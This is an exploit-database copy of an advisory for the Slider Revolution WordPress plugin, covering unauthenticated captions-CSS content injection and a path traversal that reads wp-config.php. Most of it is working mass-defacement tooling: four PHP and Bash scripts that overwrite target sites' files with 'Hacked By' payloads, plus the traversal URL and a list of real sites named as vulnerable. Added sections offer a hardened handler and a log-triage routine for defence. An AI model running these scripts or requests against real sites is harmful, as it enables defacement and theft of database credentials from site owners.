WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection

CVE               : CVE-2019-1663 (aggregator metadata; the advisory copied below cites no CVE itself)
Category          : CWE-74
Price             : Not specified
Severity          : High
Author            : exploitalert
Risk              : High
Exploitation Type : Remote
Date              : 2019-03-21
CPE               : cpe:/a:wordpress:wordpress:5.1.1
CVSS              : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
EPSS              : 0.4443
EPSS percentile   : 0.66205


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030176

Below is a copy:

WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection
############################################################################################

# Exploit Title : WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 20/03/2019 
# Vulnerability Discovered Date : 2013 - 2014
# Vendor Homepage : revolution.themepunch.com - codecanyon.net
# Software Information Link : codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Affected Versions : Slider Revolution 4.6.5 and lower (4.x branch)
# Software Price Type : Paid Download - 26$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html

############################################################################################

# Description about Software :
***************************
Slider Revolution (Revolution Slider) is an innovative, responsive WordPress Slider Plugin that displays your content the beautiful way. Whether it's a Slider, Carousel, Hero Image or Video Scene for best conversion rates or even a whole Front Page, the visual, drag & drop editor will let you tell your own stories in no time! Desktop or mobile device!

Note : This exploit was used in the wild in 2014 - 2015, but it was never shared in detail. That's why I made it public.

############################################################################################

# Impact :
***********
The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize, or incorrectly neutralizes, special elements that could modify how it is parsed or interpreted when it is sent to a downstream component (CWE-74). Here the downstream component is the plugin's captions CSS file, and the result is content injection: an unauthenticated request overwrites that file with attacker-chosen content, which the same plugin then serves back to every visitor of the get_captions_css URL.

############################################################################################

# Explanation for Vulnerability :
********************************
# Vulnerability : 
************
/wp-content/plugins/revslider/revslider_admin.php

The plugin's AJAX handler is reached through the WordPress entry point

/wp-admin/admin-ajax.php

and dispatches on a second parameter, client_action, straight from the request, with no nonce and no capability check in front of the dispatch. The request that writes the captions file is:

"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<attacker-chosen content>"

update_captions_css stores the data parameter as the plugin's captions CSS; get_captions_css returns the stored file. admin-ajax.php answers with Content-Type: text/html by default, and the stored string comes back inside the JSON reply without being HTML-escaped, so injected markup is rendered by a browser that opens the get_captions_css URL. That is what the exploiters below rely on.

# Vulnerability Message :
*************************
A request that does not reach the write path (missing or unknown client_action, or a target that is not the vulnerable version) is answered with:

{"success":false,"message":"Wrong request"}

# Vulnerability Error for Successful Exploitation :
*****************************************
A successful update_captions_css call is answered with a JSON object whose success flag is true; the exploiters below key on it:

{"success":true,"message":"","data":"

# Directory File Destination :
************************
The injected content is then served from:

/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

# Vulnerable Source Code :
************************
(revslider_admin.php, abridged; client_action and data are taken from the raw request and dispatched directly)

$action = self::getPostGetVar("client_action");
$data = self::getPostGetVar("data");
...
case "get_captions_css":
    $contentCSS = $operations->getCaptionsContent();
    self::ajaxResponseData($contentCSS);
...
case "update_captions_css":
    $arrCaptions = $operations->updateCaptionsContentData($data);
    self::ajaxResponseSuccess("CSS file saved succesfully!", array("arrCaptions" => $arrCaptions));
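The checks that dispatch is missing, as an added example written for this page: it is not Slider Revolution's code and was not part of the original advisory. It assumes it is loaded inside WordPress, so check_ajax_referer, current_user_can, wp_send_json_success/wp_send_json_error, wp_check_filetype, sanitize_key and wp_unslash are the core functions of those names; the RS_CAPTIONS_FILE and RS_IMAGE_DIR paths, the nonce action name and the hook/function names are assumptions made for the example.

```php
<?php
// Added example for this page, not Slider Revolution's own code: the same
// client_action dispatch with the checks the vulnerable handler lacks. Assumes
// it runs inside WordPress; the two paths and all names below are assumptions.
if (!defined('RS_CAPTIONS_FILE')) {
    define('RS_CAPTIONS_FILE', WP_PLUGIN_DIR . '/revslider/rs-plugin/css/captions.css');
}
if (!defined('RS_IMAGE_DIR')) {
    define('RS_IMAGE_DIR', WP_CONTENT_DIR . '/uploads/revslider');
}

// Registered for logged-in users only. There is deliberately no
// wp_ajax_nopriv_ counterpart, so an anonymous POST never reaches the handler.
add_action('wp_ajax_revslider_ajax_action', 'rs_hardened_ajax_action');
add_action('wp_ajax_revslider_show_image', 'rs_hardened_show_image');

function rs_require_admin_request() {
    // CSRF: the request must carry a nonce minted for this action
    // (the admin page would embed it via wp_create_nonce('revslider_actions')).
    check_ajax_referer('revslider_actions', 'nonce');
    // Authorization: a subscriber account must not be able to rewrite site CSS
    // or read server files. wp_send_json_error() terminates the request.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'Insufficient privileges'), 403);
    }
}

function rs_hardened_ajax_action() {
    rs_require_admin_request();
    $action = isset($_POST['client_action']) ? sanitize_key($_POST['client_action']) : '';
    $data   = isset($_POST['data']) ? (string) wp_unslash($_POST['data']) : '';

    switch ($action) {
        case 'get_captions_css':
            // wp_send_json_* replies as application/json rather than
            // admin-ajax.php's default text/html, so stored markup would not
            // render in a browser even if it got into the file.
            wp_send_json_success(array('css' => (string) @file_get_contents(RS_CAPTIONS_FILE)));
            break;
        case 'update_captions_css':
            // The file is a stylesheet: a literal '<' has no place in CSS outside
            // a quoted string, and every payload on this page needs one.
            if (strpos($data, '<') !== false) {
                wp_send_json_error(array('message' => 'Only CSS is accepted'), 400);
            }
            file_put_contents(RS_CAPTIONS_FILE, $data, LOCK_EX);
            wp_send_json_success(array('message' => 'CSS file saved successfully!'));
            break;
        default:
            wp_send_json_error(array('message' => 'Wrong request'), 400);
    }
}

function rs_hardened_show_image() {
    rs_require_admin_request();
    $base = realpath(RS_IMAGE_DIR);
    // basename() discards every directory component, so "../wp-config.php"
    // becomes "wp-config.php"; the realpath prefix check then confines the
    // result to the image directory even through symlinks.
    $name = isset($_GET['img']) ? basename((string) wp_unslash($_GET['img'])) : '';
    $path = ($name === '' || $base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        wp_send_json_error(array('message' => 'Not found'), 404);
    }
    $type = wp_check_filetype($path);
    if (!in_array($type['type'], array('image/jpeg', 'image/png', 'image/gif'), true)) {
        wp_send_json_error(array('message' => 'Not an image'), 415);
    }
    header('Content-Type: ' . $type['type']);
    header('Content-Length: ' . filesize($path));
    readfile($path);
    wp_die();
}
```

Leaving out the wp_ajax_nopriv_ registration is what removes the unauthenticated path every exploiter on this page uses; the nonce and capability checks stop a logged-in low-privilege account from using the same endpoints, and the basename/realpath pair closes the wp-config.php read described further down.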

# Database Configuration File Download :
************************************
A second action of the same plugin, revslider_show_image, takes a file name in the img parameter and opens it without stripping "..", so any file the web server can read is returned. The WordPress configuration file is one GET away:

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Information of interest in the returned MySQL database configuration file =>
****************************************************
/** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');

Note : The PHP and Bash exploiters below automate the captions-CSS injection; the wp-config.php download needs nothing more than the single request above.

############################################################################################

# Content Injection PHP Exploiter 1:
********************************

<b>..::|| Wordpress Revslider UpdateCaptionsCSS GetCaptionsCSS Content Injection Exploiter ||::..</b>
<?php
/*
[#]Coded By : KingSkrupellos
[#]www.cyberizm.org
*/
//======================================================
@error_reporting(0);
@set_time_limit(0);
//======================================================
// One target per line: scheme and host, no trailing slash.
echo '<form method="post">
<textarea name="s" cols="50" rows="13" ></textarea><br>
<input type="submit" name="g" value="GO" />
</form>';
//=======================================================
if (isset($_POST['g']) and !empty($_POST['s'])) {

    $urls = explode("\r\n", $_POST['s']);
    foreach ($urls as $url) {
        $url = trim($url);
        // POST body carries the write action; the URL below still names get_captions_css.
        $post = array(
            "action"        => "revslider_ajax_action",
            "client_action" => "update_captions_css",
            "data"          => "<h2>Hacked By KingSkrupellos Cyberizm Digital Security Army<br>:)<br>"
        );

        $site = $url . "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $site);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        $cn = curl_exec($ch);
        curl_close($ch);

        // Read the captions file back and look for the injected marker.
        // stripos() replaces eregi(), which no longer exists in PHP 7 and later.
        $fcn = (string) @file_get_contents($site);
        if (stripos($fcn, 'hacked') !== false) {
            echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>";
        } else {
            echo "[!]$url : failed<br>";
        }
    }
}
//========================= \!/ Mission Accomplished \!/ ====================================================//
?>

############################################################################################

# Content Injection PHP Exploiter 2 :
*********************************

<?php
        echo "\n+-------------------------------------------+\n";
        echo "|  Cyberizm Digital Security Army             |\n";
        echo "|     www.cyberizm.org |\n";
        echo "+-------------------------------------------+\n";

// Usage: php exploiter2.php targets.txt  (one site per line, e.g. http://host)
$agent = "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0";
$cookie_file_path = sys_get_temp_dir() . "/revslider_cookies.txt";

$gv = @file_get_contents($argv[1]);
$exv = explode("\r\n", $gv);
echo "\n\t Total site loaded : " . count($exv) . "\n\n";
foreach ($exv as $url) {
    $url = trim($url);
    if ($url === '') continue;
    echo "\n[+]Scaning : $url \n";
    dr($url);
}

function dr($site) {
    global $agent, $cookie_file_path;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array(
        "action"        => "revslider_ajax_action",
        "client_action" => "update_captions_css",
        "data"          => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"
    ));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $result = curl_exec($ch);
    curl_close($ch);

    // A successful write answers {"success":true,...}. stripos() replaces eregi(),
    // which was removed in PHP 7.
    if (stripos((string) $result, 'true') === false) {
        echo "\n[-]Exploit Fail \n\n";
        return;
    }

    // Read the captions file back and confirm the marker is served.
    // The marker is the common prefix of the payload ("...Security Team" above).
    $path = "$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
    $gett = (string) @file_get_contents($path);
    if (preg_match('/Hacked by KingSkrupellos/', $gett)) {
        echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
        $fo = fopen("finish.txt", "a+");
        fwrite($fo, $path . "\r\n");
        fclose($fo);
    } else {
        echo "| " . $site . " : Not Revslider \n\n";
    }
}
?>

############################################################################################

# Content Injection Bash Exploiter 3 :
*********************************
#!/bin/bash
#coded = IBT
# Usage: run the script and enter the path of a file with one host per line.
# Results: success.txt collects the defaced get_captions_css URLs, load.txt
# remembers hosts already processed.
SS(){
# --form-string instead of -F for the payload: -F would interpret the ';' inside
# the inline style as a field option and truncate the data.
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_captions_css" \
-F "action=revslider_ajax_action" \
--form-string "data=x$(cat tmp/s.txt)" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
CD(){
rm -f tmp/cd.txt
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "--> ${1} : not vuln"
return 1
fi
# The captions file is served back; the marker proves the write landed.
if grep -qi "KingSkrupellos" tmp/cd.txt;then
echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
else
echo "--> ${1} : exploit failed"
return 1
fi
}
CV(){
rm -f tmp/cv.txt
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "--> ${1} : not vuln"
return 1
fi
# Without a client_action the plugin answers "wrong ajax action:", which
# fingerprints an installed revslider before anything is written.
if grep -q "wrong ajax action:" tmp/cv.txt;then
echo "--> ${1} : found revslider"
else
echo "--> ${1} : not vuln"
return 1
fi
}
Exp(){
while read -r url
do
urlnya=$(echo "$url" | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
[ -z "$urlnya" ] && continue
if [ ! -f load.txt ];then
touch load.txt
fi
# Hosts already present in load.txt were processed in an earlier run;
# delete load.txt to process them again.
if grep -qF "$urlnya" load.txt;then
continue
fi
echo "$urlnya" >> load.txt
echo "--> $urlnya : check"
# Each step returns non-zero on failure so the loop moves on to the next host.
CV "$urlnya" || continue
SS "$urlnya"
CD "$urlnya"
done < "$list"
}
Lengkap(){
if [ ! -f "$list" ];then
echo "[!] $list not exist"
exit 1
fi
mkdir -p tmp
if [ ! -f tmp/s.txt ];then
cat > tmp/s.txt <<_script
<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'>
_script
fi
Exp
}
read -p "[+] Enter list target = " list
Lengkap

############################################################################################

# Content Injection PHP Exploiter 4 :
*********************************
<?php
// Single-target version: replace localhost with the site under test.
$post = array(
    "action"        => "revslider_ajax_action",
    "client_action" => "update_captions_css",
    "data"          => "<marquee>Hacked By KingSkrupellos Cyberizm Digital Security Army</marquee>"
);

$ch = curl_init("http://localhost/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec($ch);
curl_close($ch);

// {"success":true,...} means the captions file was overwritten.
echo $data, PHP_EOL;
?>
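For the defensive side, an added example that is not part of the original advisory: a small access-log triage routine for the request shapes this page documents, the update_captions_css write (and the bare POSTs that exploiters 2 to 4 send, whose parameters sit in the body and never reach the access log), the fingerprint probe the bash exploiter uses, and the revslider_show_image path traversal. The log lines are constructed for the example using RFC 5737 documentation addresses; the parser assumes the Apache/Nginx "combined" format.

```php
<?php
// Added example for this page (not part of the original advisory): triage an
// access log for the revslider request shapes documented above. SAMPLE_LOG is
// constructed for the example; the regex assumes the "combined" log format.

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [21/Mar/2019:10:02:11 +0000] "POST /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Mar/2019:10:02:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css HTTP/1.1" 200 1189 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Mar/2019:10:05:40 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3021 "-" "curl/7.64.0"
192.0.2.44 - - [21/Mar/2019:10:07:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action HTTP/1.1" 200 68 "-" "Mozilla/5.0"
192.0.2.44 - - [21/Mar/2019:10:07:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Mar/2019:10:09:15 +0000] "GET /wp-content/uploads/2019/03/hero.jpg HTTP/1.1" 200 44120 "https://example.org/" "Mozilla/5.0"
LOG;

/**
 * Return one finding string per suspicious admin-ajax.php request.
 * Per-client state links a fingerprint probe to the bare POST that follows it,
 * because exploiters that put action/client_action in the POST body leave
 * nothing but "POST /wp-admin/admin-ajax.php" in the access log.
 */
function triage_revslider_log(string $log): array {
    $findings = [];
    $probed = [];   // ip => true after a revslider fingerprint probe
    $posted = [];   // ip => true after a POST that may have rewritten captions.css

    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;
        }
        [, $ip, $ts, $method, $target] = $m;
        if (parse_url($target, PHP_URL_PATH) !== '/wp-admin/admin-ajax.php') {
            continue;
        }
        parse_str((string) parse_url($target, PHP_URL_QUERY), $q);
        $action = (string) ($q['action'] ?? '');
        $client = (string) ($q['client_action'] ?? '');
        $reason = null;

        if ($action === 'revslider_show_image') {
            // The file-read shape: img= with a traversal component or naming wp-config.php.
            $img = (string) ($q['img'] ?? '');
            if (strpos($img, '..') !== false || preg_match('~(^|/)wp-config\.php$~i', $img)) {
                $reason = "revslider_show_image path traversal (img=$img)";
            }
        } elseif ($action === 'revslider_ajax_action') {
            if ($method === 'POST') {
                // Any POST may carry client_action=update_captions_css in its body,
                // whatever the query string says (exploiter 1 posts to the get_ URL).
                $reason = 'POST to revslider_ajax_action' . ($client !== '' ? " (query says $client)" : '');
                $posted[$ip] = true;
            } elseif ($client === '') {
                // The plugin answers "wrong ajax action:" here; the bash exploiter's CV step.
                $reason = 'revslider fingerprint probe (no client_action)';
                $probed[$ip] = true;
            } elseif ($client === 'get_captions_css' && !empty($posted[$ip])) {
                $reason = 'get_captions_css read-back after a POST from the same client (defacement check)';
            }
        } elseif ($action === '' && $method === 'POST' && !empty($probed[$ip])) {
            $reason = 'bare POST to admin-ajax.php right after a fingerprint probe (parameters in body)';
            $posted[$ip] = true;
        }

        if ($reason !== null) {
            $findings[] = sprintf('%s [%s] %s %s: %s', $ip, $ts, $method, $target, $reason);
        }
    }
    return $findings;
}

// Usage: php triage.php   (feed file_get_contents('/var/log/nginx/access.log') instead of SAMPLE_LOG)
foreach (triage_revslider_log(SAMPLE_LOG) as $finding) {
    echo $finding, PHP_EOL;
}
```

On the sample the routine reports five lines: the two 203.0.113.7 requests (write, then read-back), the wp-config.php traversal, and the probe-then-bare-POST pair from 192.0.2.44; the image fetch is ignored. The probe correlation is the important part: on its own a bare POST to admin-ajax.php is ordinary WordPress traffic, but one that follows a client_action-less revslider_ajax_action GET from the same address is the bash exploiter's exact sequence.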

############################################################################################

# Example Vulnerable Sites :
*************************
[+] filature-lille.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] daniperezrun.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] bilateralsolutions.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] blog.acquaesapone.it/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] new.med.com.do/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

[+] en.neural.co.jp/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.
